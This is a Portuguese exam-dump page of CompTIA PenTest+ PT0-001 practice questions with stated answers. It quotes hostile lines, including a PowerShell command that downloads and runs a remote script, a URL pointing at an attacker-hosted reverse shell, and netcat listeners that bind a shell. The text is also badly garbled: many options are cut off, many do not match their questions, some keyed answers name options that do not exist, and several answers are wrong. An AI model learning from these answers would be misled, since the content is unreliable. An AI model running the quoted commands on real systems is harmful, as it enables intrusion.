NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Perguntas mais recentes do exame CompTIA PenTest+ PT0-001 para uma preparação eficaz

Está a preparar-se para o exame CompTIA PenTest+ PT0-001 e precisa de materiais de estudo eficazes? Não procure mais! A nossa coleção abrangente de perguntas e respostas de exame, perguntas de teste meticulosamente elaboradas e recursos de exame inestimáveis irão ajudá-lo a preparar-se com confiança. Concebidos para simular a experiência real do exame, os nossos exames simulados são uma parte essencial da sua estratégia de preparação. Permitem-lhe avaliar os seus conhecimentos, identificar áreas a melhorar e desenvolver as competências necessárias para passar com êxito. Com os nossos materiais de estudo e testes práticos seleccionados por especialistas, obterá uma compreensão profunda dos conceitos, ferramentas e técnicas de testes de penetração. Quer seja um profissional experiente ou esteja apenas a iniciar o seu percurso na cibersegurança, os nossos recursos são adaptados para satisfazer as suas necessidades e garantir o seu sucesso no dia do exame.
Faça outros exames online

Pergunta #1
Qual das seguintes propriedades do acordo de compromisso de teste de penetração terá o MAIOR impacto na observação e teste dos sistemas de produção nas suas cargas mais elevadas?
A. Criação de um âmbito dos sistemas de produção críticos
B. Estabelecer um calendário de horários de acesso aos testes
C. Estabelecer um compromisso de teste de caixa branca
D. Ter a direção a assinar os testes intrusivos
Ver resposta
Resposta correta: B
Pergunta #2
Em qual dos seguintes cenários um testador efectuaria um ataque Kerberoasting?
A. O testador comprometeu um dispositivo Windows e descarrega os segredos LSA
B. O testador precisa de recuperar a base de dados SAM e decifrar os hashes das palavras-passe
C. O testador comprometeu um utilizador com privilégios limitados e precisa de visar outras contas para movimento lateral
D. O testador comprometeu uma conta e precisa de descarregar hashes e palavras-passe em texto simples do sistema
Ver resposta
Resposta correta: C
Pergunta #3
Um técnico de testes de penetração está a preparar-se para realizar testes de API. Qual das seguintes opções seria MAIS útil na preparação para este compromisso?
A. ikto
B. UERRA
C. 3AF
D. wagger
Ver resposta
Resposta correta: D
Pergunta #4
Após várias tentativas, um atacante conseguiu obter acesso não autorizado através de um sensor biométrico utilizando a impressão digital real do atacante sem exploração. Qual das seguintes é a explicação MAIS provável para o que aconteceu?
A. O dispositivo biométrico está mais direcionado para os falsos positivos
B. O dispositivo biométrico está configurado mais para verdadeiros negativos
C. O dispositivo biométrico está definido como fechado por defeito
D. O dispositivo biométrico duplicou a impressão digital de um utilizador válido
Ver resposta
Resposta correta: A
Pergunta #5
Uma verificação de vulnerabilidade identifica que um certificado SSL não corresponde ao nome do host; no entanto, o cliente contesta a descoberta. Qual das seguintes técnicas o testador de penetração pode executar para julgar a validade das descobertas?
A. ertifique-se de que o scanner pode efetuar pedidos de DNS de saída
B. ertifique-se de que o scanner está configurado para efetuar a resolução ARP
C. ertifique-se de que o scanner está configurado para analisar hosts IP
D. ertifique-se de que o scanner tem os plug-ins adequados carregados
Ver resposta
Resposta correta: A
Pergunta #6
Em qual dos seguintes cenários um testador efectuaria um ataque Kerberoasting?
A. O testador comprometeu um dispositivo Windows e descarrega os segredos LSA
B. O testador precisa de recuperar a base de dados SAM e decifrar os hashes das palavras-passe
C. O testador comprometeu um utilizador com privilégios limitados e precisa de visar outras contas para movimento lateral
D. O testador comprometeu uma conta e precisa de descarregar hashes e palavras-passe em texto simples do sistema
Ver resposta
Resposta correta: C
Pergunta #7
Foi pedido a um técnico de testes de penetração que efectuasse uma pesquisa do SO com o Nmap utilizando um ficheiro de texto fornecido pela empresa que contém uma lista de endereços IP. Quais dos seguintes itens são necessários para realizar essa varredura? (Escolha dois.).
A. Atravessamento de directórios
B. Scripting entre sítios
C. nclusão remota de ficheiros
D. Enumeração de utilizadores
Ver resposta
Resposta correta: BE
Pergunta #8
Um consultor de segurança está a tentar atacar um dispositivo com uma conta de utilizador previamente identificada. Qual dos seguintes tipos de ataques está a ser executado?
A. rpspoof -c ambos -r -t 192
B. rpspoof -t 192
C. rpspoof -c both -t 192
D. rpspoof -r -t 192
Ver resposta
Resposta correta: D
Pergunta #9
Dado o seguinte guião: Qual das seguintes opções descreve MELHOR o objetivo deste guião?
A. Recolha de registos
B. Recolha de eventos
C. Monitorização das teclas premidas
D. oleção de mensagens de depuração
Ver resposta
Resposta correta: C
Pergunta #10
Uma empresa efectuou um teste de penetração anual ao seu ambiente. Para além de várias novas descobertas, todas as descobertas identificadas anteriormente persistiram no último relatório. Qual das seguintes é a razão mais provável?
A. A infraestrutura está a ser substituída por hardware e software semelhantes
B. Os administradores de sistemas estão a aplicar os patches errados
C. A organização não está a tomar medidas para remediar as constatações identificadas
D. As ferramentas de teste de penetração estavam mal configuradas
Ver resposta
Resposta correta: C
Pergunta #11
Um testador de penetração comprometeu um host. Qual das seguintes opções seria a sintaxe correcta para criar um Netcat listener no dispositivo?
A. c -lvp 4444 /bin/bash
B. c -vp 4444 /bin/bash
C. c -p 4444 /bin/bash
D. c -lp 4444 -e /bin/bash
Ver resposta
Resposta correta: A
Pergunta #12
Ao tentar manter a persistência num sistema Windows com privilégios limitados, qual das seguintes chaves de registo deve ser utilizada pelo verificador?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_UTILIZADOR_ACTUAL
D. HKEY_CURRENT_CONFIG
Ver resposta
Resposta correta: C
Pergunta #13
Um testador de penetração observa que várias portas com números elevados estão à escuta num servidor Web público. No entanto, o proprietário do sistema diz que o aplicativo usa apenas a porta 443. Qual das seguintes opções seria a MELHOR para recomendar?
A. azer a transição da aplicação para outra porta
B. iltrar a porta 443 para endereços IP específicos
C. Implementar uma firewall de aplicação Web
D. esativar serviços desnecessários
Ver resposta
Resposta correta: D
Pergunta #14
Um avaliador inicia um teste de segurança interna do domínio Windows internal.comptia.net. O avaliador recebe acesso à rede via DHCP, mas não recebe nenhum mapa de rede ou endereço IP de destino. Qual dos seguintes comandos o avaliador pode usar para encontrar qualquer controlador de domínio Windows provável?
A. Utilizar a modificação do caminho para escapar à estrutura da aplicação
B. riar uma moldura que se sobreponha à aplicação
C. Injetar um iframe malicioso que contenha JavaScript
D. Passar um atributo iframe que seja malicioso
Ver resposta
Resposta correta: A
Pergunta #15
Durante um teste de penetração de rede interna, um testador recupera o hash da senha NTLM de um usuário conhecido por ter privilégios totais de administrador em vários sistemas-alvo. Os esforços para decifrar o hash e recuperar a palavra-passe em texto simples não tiveram êxito. Qual dos seguintes seria o MELHOR alvo para esforços de exploração contínuos?
A. istema operativo: Windows 7Portas abertas: 23, 161
B. istema operativo: Windows Server 2016Portas abertas: 53, 5900
C. istema operativo: Windows 8
D. istema operativo: Windows 8Portas abertas: 514, 3389
Ver resposta
Resposta correta: C
Pergunta #16
Um técnico de testes de penetração efectuou várias análises de vulnerabilidades num sistema alvo. Qual das seguintes opções seria exclusiva de uma verificação com credenciais?
A. Explorações para vulnerabilidades encontradas
B. Configurações de serviço pormenorizadas
C. Software de terceiros não corrigido
D. onfigurações de controlo de acesso fracas
Ver resposta
Resposta correta: A
Pergunta #17
Uma empresa contratou um testador de penetração para efetuar uma avaliação de uma aplicação que reside na DMZ da empresa. Antes de realizar o teste, em qual das seguintes soluções o endereço IP do testador de penetração deve ser colocado na lista de permissões?
A. AF
B. IDS
C. IDS
D. LP
Ver resposta
Resposta correta: C
Pergunta #18
Um consultor quer fazer um scan de todas as portas TCP num dispositivo identificado. Qual dos seguintes switches do Nmap completará esta tarefa?
A. p-
B. p ALL
C. p 1-65534
D. porta 1-65534
Ver resposta
Resposta correta: A
Pergunta #19
SIMULAÇÃOVocê é um testador de penetração executando varreduras de porta em um servidor. INSTRUÇÕESParte1: Dada a saída, construa o comando que foi usado para gerar essa saída a partir das opções disponíveis.Parte2: Uma vez que o comando é construído apropriadamente, use a saída dada para identificar os potenciais vectores de ataque que devem ser investigados mais profundamente.Se a qualquer momento você gostaria de trazer de volta o estado inicial da simulação, por favor clique no botão Reset All.Parte1 Parte2
A. Ver a secção Explicação para obter a resposta
Ver resposta
Resposta correta: A
Pergunta #20
Um testador de penetração está a efetuar uma revisão do código. Qual das seguintes técnicas de teste está a ser executada?
A. Análise dinâmica
B. Análise de fuzzing
C. Análise estática
D. Análise do tempo de execução
Ver resposta
Resposta correta: C
Pergunta #21
Depois de obter acesso inicial de baixo privilégio a um sistema Linux, um testador de penetração identifica um binário interessante na pasta pessoal de um utilizador intitulado ''changepass."-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepassUsando "strings" para imprimir caracteres imprimíveis em ASCII do changepass, o testador observa o seguinte:$ strings changepassexitsetuidstrcmpGLIBC_2.0ENV_PATH%s/changepwmallocstrlenDada esta informação, qual dos seguintes é o caminho de exploração MAIS provável para obter privilégios de root em
A. opie o changepass para um diretório gravável e exporte a variável ambiental ENV_PATH para o caminho de um binário de roubo de token intitulado changepw
B. Criar uma cópia do changepass no mesmo diretório, dando-lhe o nome de changepw
C. xportar a variável ambiental ENV_PATH para o caminho de um diretório gravável que contém um binário de roubo de tokens intitulado changepw
D. Executar o changepass no diretório atual com sudo depois de exportar a variável ambiental ENV_PATH para o caminho '/usr/local/bin'
Ver resposta
Resposta correta: D
Pergunta #22
Uma organização de cuidados de saúde tem de cumprir os regulamentos locais para proteger e atestar a proteção de informações de saúde pessoais de indivíduos abrangidos. Qual das seguintes condições deve ser especificamente testada por um técnico de testes de penetração ao efetuar uma avaliação? (Seleccione DUAS).
A. Visar um executivo com um ataque por SMS
B. Visar uma equipa específica com um ataque por correio eletrónico
C. Visar utilizadores aleatórios com uma queda de chave USB
D. Visar uma organização com um ataque do tipo "watering hole
Ver resposta
Resposta correta: DE
Pergunta #23
Quais das seguintes vulnerabilidades são MAIS prováveis de serem falsos positivos quando reportadas por um scanner automático numa página Web HTML estática? (Escolha duas.)
A. Configuração insegura de serviços e protocolos
B. xecutar o serviço SMB e SMTP
C. Fraca complexidade da palavra-passe e da conta de utilizador
D. Configuração incorrecta
Ver resposta
Resposta correta: FG
Pergunta #24
Considere o seguinte comando do PowerShell:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-CmdletQual das seguintes opções descreve MELHOR as acções executadas por este comando?
A. efinir a política de execução
B. xecutar um script remoto
C. xecutar um comando codificado
D. nstanciar um objeto
Ver resposta
Resposta correta: B
Pergunta #25
Após um teste de penetração recente, uma empresa tem uma descoberta relativa à utilização de palavras-passe de dicionário e sazonais pelos seus funcionários. Qual dos seguintes é o MELHOR controlo para remediar a utilização de termos de dicionário comuns?
A. umentar o comprimento da palavra-passe de sete para 14 caracteres
B. mplementar restrições de histórico de palavras-passe
C. onfigurar filtros de palavra-passe/
D. esativar as contas após cinco tentativas incorrectas
E. iminuir a janela de expiração da palavra-passe
Ver resposta
Resposta correta: A
Pergunta #26
Um atacante utiliza a SET para fazer uma cópia do portal de correio Web alojado na nuvem de uma empresa e envia uma mensagem de correio eletrónico na esperança de que o diretor executivo (CEO) inicie sessão para obter as credenciais de início de sessão do CEO. Este é um exemplo de qual dos seguintes tipos de ataques?
A. Ataque de solicitação
B. Ataque de falsificação de identidade
C. Ataque de Spear phishing
D. Ataque de descarregamento drive-by
Ver resposta
Resposta correta: A
Pergunta #27
Ao monitorizar os registos WAF, um analista de segurança descobre um ataque bem sucedido contra o seguinte URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.phpWhich dos seguintes passos de correção devem ser tomados para evitar este tipo de ataque?
A. Implementar uma lista negra
B. loquear redireccionamentos de URL
C. odificar os parâmetros com URL duplo
D. nterromper as chamadas externas da aplicação
Ver resposta
Resposta correta: B
Pergunta #28
Uma equipa de desenvolvimento de software migrou recentemente para um novo software de aplicação no ambiente local. Os resultados do teste de penetração mostram que existem várias vulnerabilidades. Se um técnico de testes de penetração não tiver acesso a um ambiente real ou de teste, poderá ser melhor criar o mesmo ambiente na máquina virtual. Qual das seguintes opções é a MAIS importante para a confirmação?
A. ashcat -m 5600 -r rules/bestG4
B. ashcat -m 5600 hash
C. ashcat -m 5600 -a 3 hash
D. ashcat -m 5600 -o results
Ver resposta
Resposta correta: A
Pergunta #29
Um técnico de testes de penetração tem de efetuar OSINT no pessoal de uma empresa-alvo depois de concluir o aspeto da infraestrutura. Qual dos seguintes seria o MELHOR passo para a penetração?
A. Obter informações sobre o pessoal telefonando para a empresa e utilizando técnicas de engenharia social
B. Visitar o cliente e fazer-se passar por ele para obter informações do pessoal
C. Enviar mensagens de correio eletrónico falsas ao pessoal para ver se este responde com informações sensíveis
D. Procurar na Internet informações sobre o pessoal, nomeadamente em sítios de redes sociais
Ver resposta
Resposta correta: D
Pergunta #30
Um testador de penetração está a realizar uma recolha inicial de informações sobre alguns anfitriões remotos antes de realizar uma análise de vulnerabilidades. O testador executa o seguinte comando:nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130Qual das seguintes opções descreve MELHOR a razão pela qual são especificados vários endereços IP?
A. A rede está sub-rede como a/25 ou superior, e o testador precisava de aceder a anfitriões em duas sub-redes diferentes
B. O testador está a tentar efetuar uma verificação mais furtiva ao incluir vários endereços falsos
C. A máquina de digitalização tem várias interfaces para equilibrar o pedido de digitalização ao ritmo especificado
D. Uma análise de descoberta é executada no primeiro conjunto de endereços, enquanto uma análise mais profunda e agressiva é executada contra o último anfitrião
Ver resposta
Resposta correta: B
Pergunta #31
Um testador de penetração está a tentar capturar um aperto de mão entre um cliente e um ponto de acesso, monitorizando uma rede sem fios protegida por WPA2-PSK. O testador está a monitorizar o canal correto para a rede identificada, mas não conseguiu captar um aperto de mão. Dado o cenário, qual dos seguintes ataques MELHOR ajudaria o testador a obter esse handshake?
A. Ataque de karma
B. Ataque de desautenticação
C. Ataque de fragmentação
D. Cheia de transmissão SSDI
Ver resposta
Resposta correta: B
Pergunta #32
Um testador de penetração relata que uma aplicação só está a utilizar a autenticação básica numa aplicação virada para a Internet. Qual das seguintes opções seria a MELHOR estratégia de correção?
A. Ativar a segurança de transporte estrito HTTP
B. tivar um sinalizador de cookie seguro
C. ncriptar o canal de comunicação
D. impar a entrada inválida do utilizador
Ver resposta
Resposta correta: A
Pergunta #33
Um testador de penetração explorou com sucesso uma vulnerabilidade no servidor de autenticação de uma organização e agora quer configurar um shell reverso. O testador de penetração descobre que o Netcat não está disponível no alvo. Qual das seguintes abordagens é uma opção adequada para tentar o NEXT?
A. Executar o xterm para ligar ao servidor X do destino
B. Tentativa de aumentar os privilégios para obter uma shell interactiva
C. Tenta utilizar o socket /dev/tcp
D. entativa de leitura de/etc/shadow
Ver resposta
Resposta correta: C
Pergunta #34
Foi efectuado um teste de penetração por um técnico júnior do quadro de pessoal. Durante o teste, o técnico descobriu que a aplicação Web podia revelar uma tabela SQL com informações sobre contas de utilizador e palavras-passe. Qual das seguintes opções é a forma MAIS eficaz de notificar a direção sobre esta descoberta e a sua importância?
A. Documentar as conclusões com um resumo executivo, recomendações e capturas de ecrã da divulgação da aplicação Web
B. Ligue-se ao servidor SQL utilizando esta informação e altere a palavra-passe de uma ou duas contas não críticas para demonstrar uma prova de conceito à administração
C. Notificar a equipa de desenvolvimento da descoberta e sugerir que a validação das entradas seja implementada com uma empresa profissional de testes de penetração
D. Solicitar que a direção crie um RFP para iniciar um compromisso formal com uma empresa profissional de testes de penetração
Ver resposta
Resposta correta: A
Pergunta #35
O gestor do DRAG DROPA solicita a um testador que o ajude a diagnosticar um problema no seguinte script Python:#!/usr/bin/pythons = "Administrator "O testador suspeita que se trata de um problema com o corte e a manipulação de cadeias de caracteres. Analise o seguinte segmento de código e arraste e largue a saída correcta para cada manipulação de cadeia para o segmento de código correspondente. As opções podem ser utilizadas uma vez ou não ser utilizadas de todo.Selecionar e colocar:
A. Ver a secção Explicação para obter a resposta
Ver resposta
Resposta correta: A
Pergunta #36
Um analista de segurança recebeu um relatório de penetração detalhado, que foi realizado no ambiente DMZ da organização. Foi anotado no relatório que uma descoberta tem uma pontuação de base CVSS de 10,0. Qual dos seguintes níveis de dificuldade seria necessário para explorar essa vulnerabilidade?
A. Muito difícil; os sistemas de perímetro estão normalmente atrás de uma firewall
B. Algo difícil; exigiria um poder de processamento significativo para ser explorado
C. rivial; é necessário pouco esforço para explorar esta descoberta
D. Impossível; os anfitriões externos são reforçados para proteção contra ataques
Ver resposta
Resposta correta: C
Pergunta #37
A estratégia de teste de penetração de caixa preta fornece ao testador:
A. ma lista de objectivos
B. m diagrama de rede
C. ódigo fonte
D. redenciais privilegiadas
Ver resposta
Resposta correta: D
Pergunta #38
Um investigador de penetração conseguiu obter as credenciais iniciais do domínio do utilizador VPN através de phishing de um membro do departamento de TI. Posteriormente, o técnico de testes de penetração obteve hashes através da VPN e decifrou-os facilmente utilizando um ataque de dicionário. Qual das seguintes etapas de correção deve ser recomendada? (Seleccione TRÊS).
A. Fornecedor de hardware
B. Interferência de canal
C. Nomes de utilizador
D. Ponto forte
Ver resposta
Resposta correta: BCG
Pergunta #39
Qual dos seguintes excertos seria proveniente de uma política empresarial?
A. As palavras-passe dos empregados devem conter um mínimo de oito caracteres, sendo um deles alfanumérico
B. O serviço de assistência pode ser contactado através do número 800-passwd1 para efetuar a reposição da palavra-passe
C. Os funcionários devem utilizar palavras-passe fortes para aceder aos activos da empresa
D. Os sistemas empresariais têm de armazenar palavras-passe utilizando o algoritmo de hashing MD5
Ver resposta
Resposta correta: D
Pergunta #40
Um investigador de penetração obteve acesso ao dispositivo de um funcionário do departamento de marketing. O verificador de penetração pretende garantir que, se o acesso for descoberto, o controlo do dispositivo pode ser recuperado. Qual das seguintes acções deve o verificador de penetração utilizar para manter a persistência no dispositivo? (Seleccione DUAS.)
A. Hidra
B. John, o Estripador
C. ashcat
D. Pêssego
Ver resposta
Resposta correta: AC
Pergunta #41
Quais dos seguintes aspectos são MAIS importantes no planeamento de um noivado? (Seleccione DOIS).
A. Efectua um scan de portas
B. ega no banner do servidor web
C. edirecciona um TTY para um sistema remoto
D. emove os registos de erros para o IP fornecido
Ver resposta
Resposta correta: AC
Pergunta #42
Um testador de penetração está realizando uma varredura remota para determinar se o farm de servidores está em conformidade com a linha de base de software da empresa. Qual das seguintes opções o testador de penetração deve executar para verificar a conformidade com a linha de base?
A. Análise da descoberta
B. Verificação furtiva
C. Verificação completa
D. Verificação credenciada
Ver resposta
Resposta correta: A
Pergunta #43
Um técnico de testes de penetração entrega um relatório de análise de vulnerabilidades de uma aplicação Web a um cliente. O verificador de penetração classifica uma vulnerabilidade como de gravidade média. A mesma vulnerabilidade foi relatada como uma descoberta de gravidade crítica no relatório anterior. Qual das seguintes opções é a razão MAIS provável para a redução da gravidade?
A. O cliente aplicou um hot fix sem atualizar a versão
B. O panorama das ameaças alterou-se significativamente
C. O cliente actualizou a sua base de código com novas funcionalidades
D. tualmente, não existem explorações conhecidas para esta vulnerabilidade
Ver resposta
Resposta correta: A
Pergunta #44
Pede-se a Joe, um técnico de testes de penetração, que avalie a segurança física de uma empresa, acedendo ao seu escritório. Joe está à procura de um método que lhe permita entrar no edifício durante o horário de expediente ou quando não há funcionários no local. Qual das seguintes opções seria a MAIS eficaz para o conseguir?
A. Clonagem de crachás
B. Arrombamento de fechaduras
C. ailgating
D. Pegar carona
Ver resposta
Resposta correta: A
Pergunta #45
Um testador de penetração executou um pivô para um novo dispositivo Linux em uma rede diferente. O testador escreve o seguinte comando:for m in {1..254..1};do ping -c 1 192.168.101.$m; doneQual das seguintes opções descreve MELHOR o resultado da execução deste comando?
A. Varrimento de portas
B. Enumeração de serviços
C. Identificação do hospedeiro vivo
D. Negação de serviço
Ver resposta
Resposta correta: C
Pergunta #46
Um consultor está a realizar um ataque de engenharia social contra um cliente. O consultor conseguiu recolher uma série de nomes de utilizador e palavras-passe utilizando uma campanha de phishing. O consultor recebe credenciais para iniciar sessão em várias contas de correio eletrónico de funcionários. Tendo em conta as conclusões, qual das seguintes medidas o consultor deve recomendar que seja implementada?
A. Política de palavras-passe fortes
B. Encriptação da palavra-passe
C. Reforço do sistema de correio eletrónico
D. Autenticação de dois factores
Ver resposta
Resposta correta: D
Pergunta #47
Qual das seguintes opções tem um impacto direto e significativo no orçamento da avaliação da segurança?
A. Delimitação do âmbito
B. Programação
C. Requisitos de conformidade
D. Risco-alvo
Ver resposta
Resposta correta: D
Pergunta #48
Um testador de penetração efectuou uma avaliação de segurança para uma empresa em fase de arranque. O relatório lista um total de dez vulnerabilidades, com cinco identificadas como críticas. O cliente não tem os recursos necessários para corrigir imediatamente todas as vulnerabilidades. Nessas circunstâncias, qual das seguintes opções seria a MELHOR sugestão para o cliente?
A. Para remover a persistência
B. Para ativar a persistência
C. Para comunicar a persistência
D. Para verificar a persistência
Ver resposta
Resposta correta: D
Pergunta #49
Um técnico de testes de penetração entrega um relatório de análise de vulnerabilidades de uma aplicação Web a um cliente. O verificador de penetração classifica uma vulnerabilidade como de gravidade média. A mesma vulnerabilidade foi relatada como uma descoberta de gravidade crítica no relatório anterior. Qual das seguintes opções é a razão MAIS provável para a redução da gravidade?
A. O cliente aplicou um hot fix sem atualizar a versão
B. O cenário de ameaças mudou significativamente
C. O cliente actualizou a sua base de código com novas funcionalidades
D. Atualmente, não existem explorações conhecidas para esta vulnerabilidade
Ver resposta
Resposta correta: A
Pergunta #50
Um técnico de testes de penetração foi designado para efetuar uma avaliação da penetração externa de uma empresa. Qual das seguintes etapas seria a MELHOR ajuda para o processo de recolha de informações passivas? (Escolha duas.)
A. Miúdos do guião
B. Actores APT
C. Ameaças internas
D. Grupos hacktivistas
Ver resposta
Resposta correta: DE
Pergunta #51
Um técnico de testes de penetração conseguiu introduzir um comando de injeção SQL numa caixa de texto e obter acesso às informações armazenadas na base de dados. Qual das seguintes é a MELHOR recomendação para mitigar a vulnerabilidade?
A. Randomizar as credenciais utilizadas para iniciar sessão
B. nstalar a deteção de intrusão baseada no anfitrião
C. mplementar a normalização da entrada
D. Efetuar o endurecimento do sistema
Ver resposta
Resposta correta: D
Pergunta #52
Qual dos seguintes excertos seria proveniente de uma política empresarial?
A. As palavras-passe dos empregados devem conter um mínimo de oito caracteres, sendo um deles alfanumérico
B. O serviço de assistência pode ser contactado através do número 800-passwd1 para efetuar a reposição da palavra-passe
C. Os funcionários devem utilizar palavras-passe fortes para aceder aos activos da empresa
D. Os sistemas empresariais devem armazenar as palavras-passe utilizando o algoritmo de hashing MD5
Ver resposta
Resposta correta: D
Pergunta #53
Um técnico de testes de penetração está a testar uma aplicação bancária e descobre uma vulnerabilidade. O testador tem sessão iniciada como um utilizador não privilegiado que não deve ter acesso a quaisquer dados. Tendo em conta os dados abaixo, provenientes do proxy de interceção da Web: qual dos seguintes tipos de vulnerabilidades está a ser explorado?
A. Vulnerabilidade de navegação forçada
B. Parâmetro de vulnerabilidade à poluição
C. Vulnerabilidade de carregamento de ficheiros
D. Enumeração de cookies
Ver resposta
Resposta correta: D
Pergunta #54
Um utilizador malicioso pretende efetuar um ataque MITM a um computador. A configuração da rede do computador é a seguinte:IP: 192.168.1.20NETMASK: 255.255.255.0DEFAULT GATEWAY: 192.168.1.254DHCP: 192.168.1.253DNS: 192.168.10.10, 192.168.20.10Qual dos seguintes comandos deve o utilizador malicioso executar para efetuar o ataque MITM?
A. A colocação em lista branca impede um possível ataque DoS inadvertido contra o IPS e os sistemas de monitorização de registos de suporte
B. Os testes de penetração de sistemas IPS de terceiros requerem frequentemente documentação e autorizações adicionais, o que pode atrasar o teste sensível ao fator tempo
C. s regras de whitelisting do IPS requerem actualizações frequentes para se manterem actualizadas, desenvolvendo constantemente vulnerabilidades e pontos fracos recentemente descobertos
D. Os testes devem centrar-se na descoberta de possíveis problemas de segurança em todos os sistemas abrangidos e não na determinação da eficácia relativa das defesas activas, como um IPS
Ver resposta
Resposta correta: B
Pergunta #55
Um testador de penetração tem um shell completo para um controlador de domínio e quer descobrir qualquer conta de utilizador que não tenha sido autenticada no domínio em 21 dias. Qual dos seguintes comandos seria o MELHOR para atingir este objetivo?
A. srm -users "DN=company
B. suser -name -account -limit 3
C. squery user -inactive 3
D. squery -o -rdn -limit 21
Ver resposta
Resposta correta: D
Pergunta #56
A utilização de uma "ferramenta debaixo da porta" durante uma avaliação da segurança física é um exemplo de qual dos seguintes tipos de técnicas de intrusão?
A. esativar a porta de rede do serviço afetado
B. Completar todas as conclusões e apresentá-las ao cliente
C. Alertar prontamente o cliente com pormenores sobre a descoberta
D. olocar o alvo offline para que não possa ser explorado por um atacante
Ver resposta
Resposta correta: D
Pergunta #57
Um cliente pede a um técnico de testes de penetração que adicione mais endereços a um teste atualmente em curso. Qual das seguintes opções definiria a lista de alvos?
A. Regras de empenhamento
B. Acordo de serviços materiais
C. Declaração de trabalho
D. Contrato de licença de utilizador final
Ver resposta
Resposta correta: C
Pergunta #58
Um testador de penetração explora com êxito um servidor DMZ que parece estar a escutar numa porta de saída. O testador de penetração deseja encaminhar esse tráfego de volta para um dispositivo. Quais das seguintes são as MELHORES ferramentas a serem usadas para esse fim? (Escolha duas.)
A. ig -q any _kerberos
B. ig -q any _lanman
C. ig -q any _ntlm
D. ig -q any _smtp
Ver resposta
Resposta correta: BD
Pergunta #59
Foi pedido a um técnico de testes de penetração que efectuasse uma pesquisa do SO com o Nmap utilizando um ficheiro de texto fornecido pela empresa que contém uma lista de endereços IP. Quais dos seguintes itens são necessários para realizar essa varredura? (Escolha dois.)
A. Executar uma exploração de dia zero
B. riar um novo utilizador de domínio com uma palavra-passe conhecida
C. odificar um serviço de tempo de arranque conhecido para instanciar uma chamada de retorno
D. bter credenciais de texto claro do utilizador comprometido
Ver resposta
Resposta correta: AB
Pergunta #60
Um técnico de testes de penetração identifica as seguintes descobertas durante uma análise de vulnerabilidades externas: Qual das seguintes estratégias de ataque deve ser priorizada a partir dos resultados da análise acima?
A. Apêndices
B. Resumo executivo
C. Resumo técnico
D. Corpo principal
Ver resposta
Resposta correta: D
Pergunta #61
Os dispositivos IoT baseados no consumidor são frequentemente menos seguros do que os sistemas criados para computadores de secretária tradicionais. Qual das seguintes opções descreve MELHOR o raciocínio para este facto?
A. sfconsole
B. spaço de trabalho
C. sfvenom
D. b_init
E. b_connect
Ver resposta
Resposta correta: A
Pergunta #62
DRAG DROPPolocar cada uma das seguintes palavras-passe por ordem de complexidade, da menos complexa (1) à mais complexa (4), com base nos conjuntos de caracteres representados. Cada palavra-passe só pode ser utilizada uma vez.Selecionar e colocar:
A. Ver a secção Explicação para obter a resposta
Ver resposta
Resposta correta: A
Pergunta #63
Um cliente manifestou a sua preocupação com o número de empresas que estão a ser violadas por atacantes remotos, que procuram segredos comerciais. Qual das seguintes opções descreve MELHOR o tipo de adversários que este cliente identificaria?
A. Executar a aplicação através de um analisador de código dinâmico
B. Utilizar um utilitário de fuzzing
C. escompilar a aplicação
D. erificar as atribuições de memória
Ver resposta
Resposta correta: B
Pergunta #64
Uma empresa de energia contratou uma empresa de segurança para realizar um teste de penetração numa central eléctrica, que utiliza ICS para gerir a produção de energia e a refrigeração. Qual das seguintes é uma consideração exclusiva de tal ambiente que deve ser feita pela empresa ao se preparar para a avaliação?
A. Seleção do conjunto adequado de ferramentas de teste de segurança
B. Correntes e capacidades de carga dos componentes do ICS
C. Potenciais riscos operacionais e de segurança
D. Certificação eléctrica do equipamento utilizado no ensaio
Ver resposta
Resposta correta: A
Pergunta #65
Um cliente agendou um teste de penetração sem fios. Qual das seguintes opções descreve as informações de objetivo de definição do âmbito MAIS provavelmente necessárias antes do início do teste?
A. A localização física e os ESSIDs de rede a serem testados
B. O número de dispositivos sem fios pertencentes ao cliente
C. O fornecedor do ponto de acesso sem fios preferido do cliente
D. As bandas e frequências utilizadas pelos dispositivos do cliente
Ver resposta
Resposta correta: D
Pergunta #66
Joe, um testador de penetração, recebeu credenciais de conta básicas e entrou num sistema Windows. Para aumentar o seu privilégio, de qual dos seguintes locais está a utilizar o Mimikatz para obter credenciais?
A. iclismo A
B. assar o hash para retransmitir credenciais
C. Força bruta da palavra-passe para iniciar sessão no anfitrião
D. Sequestro de sessão para se fazer passar por uma conta de sistema
Ver resposta
Resposta correta: C
Pergunta #67
Depois de efetuar uma avaliação de segurança para uma empresa, verificou-se que o cliente foi facturado pelo tempo em que o ambiente de teste do cliente esteve indisponível. O cliente alega ter sido facturado injustamente. Qual dos seguintes documentos seria MAIS suscetível de fornecer orientação numa situação deste tipo?
A. Taxa adicional
B. Política da empresa
C. olerância ao impacto
D. Tipo de indústria
Ver resposta
Resposta correta: D

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: